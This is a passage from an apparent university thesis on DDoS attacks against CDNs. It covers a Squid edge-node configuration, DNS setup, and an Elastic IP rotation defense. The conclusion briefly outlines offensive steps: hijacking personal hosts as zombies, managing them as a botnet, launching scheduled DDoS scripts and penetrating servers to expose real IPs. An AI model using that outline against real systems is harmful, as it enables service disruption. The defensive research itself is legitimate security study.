acl Safe_ports port 210
# wais
109
acl Safe_ports port 1025-65535
# unregistered ports
110
acl Safe_ports port 280
# http-mgmt
111
acl Safe_ports port 488
# gss-http
112
acl Safe_ports port 591
# filemaker
113
acl Safe_ports port 777
# multiling http
114
acl CONNECT method CONNECT
115
acl purge method PURGE
116
117
http_access allow manager localhost
118
http_access deny manager
119
http_access deny !Safe_ports
120
121
# define ACL lists which ports are allowed
Listing 6.1: Squid based CDN edge node configuration
After configuring the Squid, then start Squid services. At the same time, ECS(47.92.137.85)
should open 80 port and provide web service by using PHPStudy. The final part was to
bind “www.lzhzzzs.xyz” the accelerated domain to the IP address(47.92.116.106) of Squid
edge node. Godaddy is a popular DNS service provider, modify the DNS record table by
creating A record or CNAME record of 47.92.116.106 to make Squid node work. If the
default DNS servers are slow, another option is directly to modify host names in godaddy
as shown in figure 6.16. Finally, when ping the accelerated domain name, the local DNS
server gave the IP address 47.92.116.106. This means the real IP address had been
hided for security. One domain name can be mapped to more than one IP address. If
there are multiple edge nodes can be used, then all IP address can be added in DNS
record table to avoid the failure of one single point. More details were showed in video
with link ”https://www.youtube.com/watch?v=56N3asLBvhU&feature=youtu.be”.
Figure 6.16: Pin result of CDN edge node
6.6
Risk analysis on CDN
The possible risks of CDN network is still the exposure of real IP address, as long as
attackers can penetrate the CDN nodes, they can sit in the internal network and probably
get access to the configuration file or logs of Squid to dig out the real IP address of origin
servers.
94
Analysis of DDoS attacks against content delivery networks
==PAGE:103==
7
Elastic IP rotation against DDoS
7.1
Elastic IP address
As the analysis of DDOS attack against CDN before, the problem existed was the ex­
posure of real IP address of origin servers when attackers penetrated the edge nodes
successfully. Then they can get specific privileges to obtain the IP information related to
the configuration of CDN network. So in this article, one solution was proposed to hide
the real IP address by elastic IP address [aws20].
When deploying applications with public cloud services, users need to deploy public IP for
cloud services in order to access servers. Public cloud service providers can not only pro­
vide fixed public network IP for servers, but also provide elastic IP. Essentially, the Elastic
IP is based on NAT technique. When building the external network server, the server
needs to be assigned an IP address that can be accessed by the external network. Cur­
rently, almost all routers working between private network and internet can support NAT.
NAT routers can have at least one valid public IP address. Elastic IP is one kind of NAT
IP, it is actually located one the public network gateway of the cloud service provider and
mapped to the private network card of the bound cloud host entity through NAT. There­
fore, a cloud host tied to an elastic public network IP can directly use the IP for public
network communication, but the IP address can not be seen on its private network card.
For cloud service providers, elastic IP help save the public IP resources. As for develop­
ers, sometimes, they would change the host according to the operation requirements of
the projects, such as changing the host with higher configuration. So every time users
change the cloud host, users have to change the IP address of deployed services. In this
way, developers have to do the address resolution again and resolve domain names to
the new IP addresses. If users use Elastic IP, after changing the host, they only need to
assign the Elastic IP to the new host, and there is no need to re­resolve the domain name
at the DNS service provider. Elastic IP as a static network resource can be bound to any
cloud devices like cloud NAT gateway, VPC or ECSs but one Elastic IP can be bound to
one entity at the same time. Cloud service provider own enough Elastic IP resources so
that they can provide reliable services for individuals and have strong enough ability to
defend against most traffic attacks.
Feature of Elastic IP address is similar to the static public IP address. User can dynam­
ically bind or unbind EIP to cloud entities without waiting for DNS to resolve the binding.
Most famous cloud service providers like Amazon, Alibaba, Tencent, etc all provide EIP
for users with strict limit. Like Amazon limited that each user can have at most 5 EIPs,
ALicloud 20 EIPs, Tencent 20EIPS. Users can not bind and unbind too frequently to affect
other users’ servers in the same VPC. The structure of EIP was shown in figure 7.1.
Analysis of DDoS attacks against content delivery networks
95
==PAGE:104==
Figure 7.1: Network structure of Elastic IP
7.2
Elastic IP rotation
After lab 4 of conducting DDOS attack, as long as IP address of origin server was at­
tacked, it can not be recovered in short time which means the IP is dead. The only way
is to change a totally new IP address to deploy everything. However, if there are enough
public IP addresses reserved, DDOS attack can be mitigated to a huge extent. This solu­
tion is behind protection of security devices, load balancing and CDN network as the last
defending barrier. Usually, large scale of mature CDN can resist most DDOS attack.
Step1: Elastic IP rotation mechanism of origin servers. Mark all Elastic IP address with
flag “damaged” which is binary bit to represent if the current used Elastic IP address was
under attack or available. All available Elastic IP addresses were put in “standby IP pool”.
Management API should be designed to bind and unbind Elastic IP address to origin
servers at regular interval. The time interval depends on the scale of traffic business.
And all available Elastic IP addresses should be selected randomly to bind the origin
server and unbind after the use of predefined time interval. If one of the working Elastic
IP address was under DDOS attack, “damaged” flag should be set as true and those bad
IP addresses will be removed from “standby IP pool”.
Step2: All CDN peer edge nodes or parent edge nodes should be synchronized with
writing Elastic IP addresses of origin servers in their network configuration files. Each
edge corresponds one Elastic IP address.
Step3: When owning enough edge nodes points to all Elastic IP addresses, all IP ad­
dresses of edge nodes should be added in DNS record table as CNAME records. Map
current working domain name to those IP addresses of CDN edge nodes. Another strat­
egy is to make each edge node pointed to all Elastic IP addresses instead of only one IP.
Step 4: Regularly check “standby IP pool” by changing a set of new Elastic IP addresses.
For example, update IP pool for every month.
Due to the dynamic property of public IP address of origin servers. Attackers have to
spend massive costs to attack all possible Elastic IP addresses. Figure 7.2 shows the
logic structure of Elastic IP Rotation.
96
Analysis of DDoS attacks against content delivery networks
==PAGE:105==
Figure 7.2: Implementation logic of Elastic IP Rotation
7.3
Lab5: Elastic IP rotation against DDoS attack
Due to the technique limit, in this lab, Elastic IP rotation was implemented manually. En­
vironment was listed below:
• Windows Server 2008 (47.92.137.85)
• Elastic IP address(47.92.241.105)
• DDOS API
• CDN edge node(47.92.116.106)
• CDN edge node(39.98.70.71)
• Godaddy(DNS service)
Suppose attackers already obtained the real IP address of origin servers by penetrating
CDN edge nodes. DDOS attack was launched and original public IP address was at­
tacked and can not be used any more. Elastic IP(47.92.137.85) address was unbound.
New Elastic IP address(47.92.241.105) was bound to the origin server. Then server can
work normally again by using the new Elastic IP address. Both Elastic IP addresses were
configured in CDN edge nodes. In DNS record table, domain name was mapped to two
edge nodes without establishing connections with origin servers directly. So when orig­
inal IP(47.92.137.85) failed, edge node(47.92.116.106) failed as well. However, CDN
edge node(39.98.70.71) was responsible for the new elastic IP address, it can work
Analysis of DDoS attacks against content delivery networks
97
==PAGE:106==
normally.
Each CDN edge node can be responsible for one Elastic IP address.
Or
each CDN edge node can be responsible for all Elastic IP addresses. But when net­
work become more distributed, more difficult it is to trace back all Elastic IP addresses
of origin servers. If CDN network has a large scale, there must be hundreds of edge
nodes all over the world.
Each edge node stores one possible working Elastic IP of
origin servers which means all global IP addresses scattered. Attackers have to figure
out which CDN edge nodes are child nodes storing only peer IPs, which edge nodes
are parent nodes storing possible Elastic IP of origin servers. They also have to find
out all Elastic IP in specific time which significantly increases the difficulty of conducting
DDOS attack. This part is hard to describe, so all details were showed in video with link
”https://www.youtube.com/watch?v=3SjfnQOR9Tw&feature=youtu.be”.
98
Analysis of DDoS attacks against content delivery networks
==PAGE:107==
8
Conclusion and future work
With the the thesis going on, a lot of problems and difficulties happened, the most obvi­
ous problem is devices limit and funds limit, so a lot of analysis of enterprise level network
can only be achieved theoretically. Though the lab network environment was a simplified
version, it can still be viewed as the real small­sized company network. This paper con­
tains a lot of contents, from security devices(FW/IDS/IPS/WAF) to load balancing, from
penetration based on system vulnerabilities to webshell and trojan virus, CDN and cloud
computing services. All of them are organized in a reasonable order. The first step was
to understand the current enterprise level network architecture and most commonly used
switching, routing and firewall techniques or protocols. Not all of them were written in this
paper. This step helps locate best positions to be attacked and one conclusion obtained
was that as long as real IP address of origin servers was exposed, the server can directly
be claimed dead. The second step was to conduct DDoS attack, the basic methodology
is that hacking personal hosts as zombie hosts, when the number of zombie hosts reach a
particular level, API should be designed to manage zombie hosts as bot net. Then upload
DDoS scripts to zombie hosts and set time tasks to launch large scale attack. However,
as mentioned before, ECS rented can not be used to attack and there were no other hosts
available. So the script can not cause enough damage with limited personal bandwidth.
Dark web provided illegal technique supports without revealing any details by only provid­
ing API. There is no other way to get contact with the latest DDoS techniques. Most open
source tools applied the outdated protocols or vulnerabilities which can not be referred.
The third step was to establish CDN. According to some hackers on dark web, a mature
CDN architecture can perfectly help companies hide the real IP address and solve most
DDoS attacks. Based on researches, operators or operator­level service providers they
have the ability to conduct data cleaning for large traffic but this will cost too much. Then
for incomplete CDN(companies did not deploy enough CDN edge nodes or multiple layer
structures), CDN can not work effectively. So the essence of DDoS attack and defense
is the fight of expenses. The fourth step was to find methods to trace back real IP ad­
dress of target servers. This step needs the penetration on web servers which requires
exploitation of latest web vulnerabilities, otherwise it is hard to succeed.
The final proposed solution EIP was basically based on Elastic IP address. However,
there are not enough documents available to get enough technical details. Those cloud
service providers just sell services rather than share them. So for future work, an API
should be designed to manage the mapping relationships between ECS entities and EIPs.
API should control entity to change its EIP periodically and automatically modify corre­
sponding DNS record table within embedded smart DNS resolution services. The first
requirement of the solution is that web owner should have enough Elastic public IP ad­
dress to ensure IP resources will not be exhausted by DDoS attack. Because once DDoS
attack means one public IP address can not be used any more.
Analysis of DDoS attacks against content delivery networks
99
==PAGE:108==
100
Analysis of DDoS attacks against content delivery networks
==PAGE:109==
Bibliography
[adm13]
admin. The complete process of penetrating a website applying CDN. 2013.
URL: http://www.91ri.org/6233.html.
[KS18]
Ambi Karthikeyan and Shijimol. Introduction to Azure IaaS. Apress, 2018.
[Cer17]
Cisco CertificationKits. Static NAT, Dynamic NAT, NAT Overload, PAT and
Configurations. 2017. URL: https://www.certificationkits.com/cisco-certification/
ccna-articles/cisco-ccna-network-address-translation-nat/static-nat-dynamic-nat-
nat-overload-pat-a-configurations/.
[Bha20]
Rashmi Bhardwaj. SNAT VS DNAT – Detailed Comparison Table. 2020. URL:
https://ipwithease.com/snat-vs-dnat/.
[Bel20]
By Lorraine Bellon. What is the difference between authoritative and recursive
DNS nameservers? 2020. URL: https://umbrella.cisco.com/blog/what- is-
the-difference-between-authoritative-and-recursive-dns-nameservers (visited on
06/30/2020).
[Cis20a]
Cisco. What Is a Firewall? 2020. URL: https://www.cisco.com/c/en/us/
products/security/firewalls/what-is-a-firewall.html#~related-topics.
[Rou11]
Derrick Rountree. Stateful Inspection. 2011. URL: https://www.sciencedirect.
com/topics/computer-science/stateful-inspection.
[che17]
chenyulancn. FW/IDS/IPS/WAF and other security devices deployment. 2017.
URL: https://blog.csdn.net/chenyulancn/article/details/78927916.
[Cis20b]
Cisco. Transparent or Routed Firewall Mode. 2020. URL: https://www.cisco.
com/c/en/us/td/docs/security/asa/asa95/configuration/general/asa-95-general-
config/intro-fw.pdf.
[Qft20]
Qftm. Small and medium­sized enterprise firewall deployment. 2020. URL:
https://www.cnblogs.com/qftm/p/12129179.html.
[fen17]
feng. Network architecture and cabling architecture of data center. 2017. URL:
https://developer.aliyun.com/article/196280.
[Ali20a]
Alicloud. Product introduction of Elastic computing service. Oct. 16, 2020. URL:
https://help.aliyun.com/document_detail/25367.html?spm=5176.10695662.
1996646101.searchclickresult.1d487572XaI6Fk.
[Ali20b]
Alicloud. Network access control list and health monitoring of servers. Dec. 28,
2020. URL: https://help.aliyun.com/document_detail/116626.html?spm=a2c4g.
11186631.6.630.78be1b5c3E1FTO.
[Ali20c]
Alicloud. Virtual private network and disaster recovery. Dec. 30, 2020. URL:
https://help.aliyun.com/document_detail/34217.html?spm=a2c4g.11186623.2.
17.28f875e0P2D6eE#concept-kbk-cpz-ndb.
[Li06a]
Junling Li. analysis of architecture of large, high­concurrency and high­load
websites (updating). 2006. URL: http://www.toplee.com/blog/71.html?spm=
a2c6h.12873639.0.0.56ed7025y0Rmdw.
[Ali20d]
Alicloud. Architecture of load balancing product. 2020. URL: https://help.aliyun.
com/document_detail/27544.html?spm=a2c4g.11186623.6.549.22507e4cD1lEqB.
[Art16]
ArthurKiller. Science: Online DDoS Attack Platform Revealed­partA. 2016. URL:
https://www.freebuf.com/special/107119.html.
[An18]
Xin An. Easy to understand what is a C&C server. 2018. URL: https://cloud.
tencent.com/developer/article/1180887.
[Lem17]
Lemon. Summary of DDoS attack methods. 2017. URL: https://www.secpulse.
com/archives/64088.html.
Analysis of DDoS attacks against content delivery networks
101
==PAGE:110==
[Qia16]
QiangWei. DDoS attack TCP UDP ICMP. 2016. URL: https://blog.csdn.net/
fly_yr/article/details/50858621?utm_medium=distribute.pc_relevant_download.
none - task - blog - baidujs - 1 . nonecase & depth _ 1 - utm _ source = distribute . pc _
relevant_download.none-task-blog-baidujs-1.nonecase.
[Art18]
ArthurKiller. Establish DDoS | reveal online DDoS attack platform­part B. 2018.
URL: https://cloud.tencent.com/developer/article/1040160.
[jes18]
jessicaiu. DDoS Attack and Defense: From Principle to Practice. 2018. URL:
https : / / blog . csdn . net / jessicaiu / article / details / 84069965 ? utm _ medium =
distribute.pc_relevant.none- task- blog- BlogCommendFromMachineLearnPai2-
2.pc_relevant_is_cache&depth_1-utm_source=distribute.pc_relevant.none-
task-blog-BlogCommendFromMachineLearnPai2-2.pc_relevant_is_cache.
[Ali20e]
Alicloud. DDoS original protection shield. 2020. URL: https://help.aliyun.com/
document_detail/40038.html?spm=a2c4g.11186623.6.581.3c203bf01AHisn.
[Zhi19]
Zhiyi. obtain the real IP address within CDN. 2019. URL: https://blog.csdn.net/
Jiajiajiang_/article/details/81514630.
[Pro20]
Agathoklis Prodromou. An Introduction to Web Shells (Web Shells Part 1).
2020. URL: https://www.acunetix.com/blog/articles/introduction-web-shells-
part-1/.
[Xia20]
Xiangyu. PHP code audit 5 (code execution vulnerability). Aug. 20, 2020. URL:
https://www.programmersought.com/article/94095535444/.
[cak18]
cake. Metinfov5.0.4 bug reappears. 2018. URL: https://blog.csdn.net/Key_
book/article/details/80604830.
[Chu19]
Chuangxinhulian. NTP amplified attack principle and solution. 2019. URL: http:
//www.idccx.com/help/103.html.
[CCE14]
CCERT. Solution to NTP service amplification attack. 2014. URL: http://www.
ccert.edu.cn/archives/148.
[adm20]
admin. Virtual IP principle (dynamic IP, fixed IP, solid IP). 2020. URL: http:
//www.djjlll.com/html/2020/news_30/1880.html.
[ZZ03]
Wensong Zhang and Wenzhuo Zhang. “Linux Virtual Server Clusters: Build
highly­scalable and highly­available network services at low cost”. In: (2003).
[yil15]
yiluyangguang1234. technical report of vrrp. 2015. URL: https://blog.csdn.net/
yiluyangguang1234/article/details/49981555.
[Li06b]
Junling Li. High load oriented architecture Lighttpd+PHP(FastCGI)+Memcached+Squid.
2006. URL: http://www.toplee.com/blog/337.html.
[Ali19]
Alicloud. High available load balancing architecture. 2019. URL: https://help.
aliyun.com/document_detail/67915.html?spm=a2c4g.11186623.6.548.25e02e28YkkDBo.
[che20]
chengxuyonghu. Summary of cache server techniques. 2020. URL: https://
www.cnblogs.com/chengxuyonghu/p/13683468.html.
[XX18]
XX. Nginx Learning Notes (Reverse Proxying & Clustering). 2018. URL: https:
/ / blog . csdn . net / java _ faep / article / details / 82430215 ? ops _ request _ misc =
&request_id=&biz_id=102&utm_term=%25E8%2582%2589%25E9%25B8%
25A1%25E9%259B%2586%25E7%25BE%25A4&utm_medium=distribute.pc_
search_result.none-task-blog-2~all~sobaiduweb~default-5-82430215.first_rank_
v2_pc_rank_v29.
[aws20]
aws. Elastic IP addresses. 2020. URL: https://docs.aws.amazon.com/AWSEC2/
latest/UserGuide/elastic-ip-addresses-eip.html.
102
Analysis of DDoS attacks against content delivery networks
==PAGE:111==
Technical
University of
Denmark
Richard Petersens Plads, building 324
2800 Kongens Lyngby, Denmark
Tlf. 4525 1700
www.compute.dtu.dk
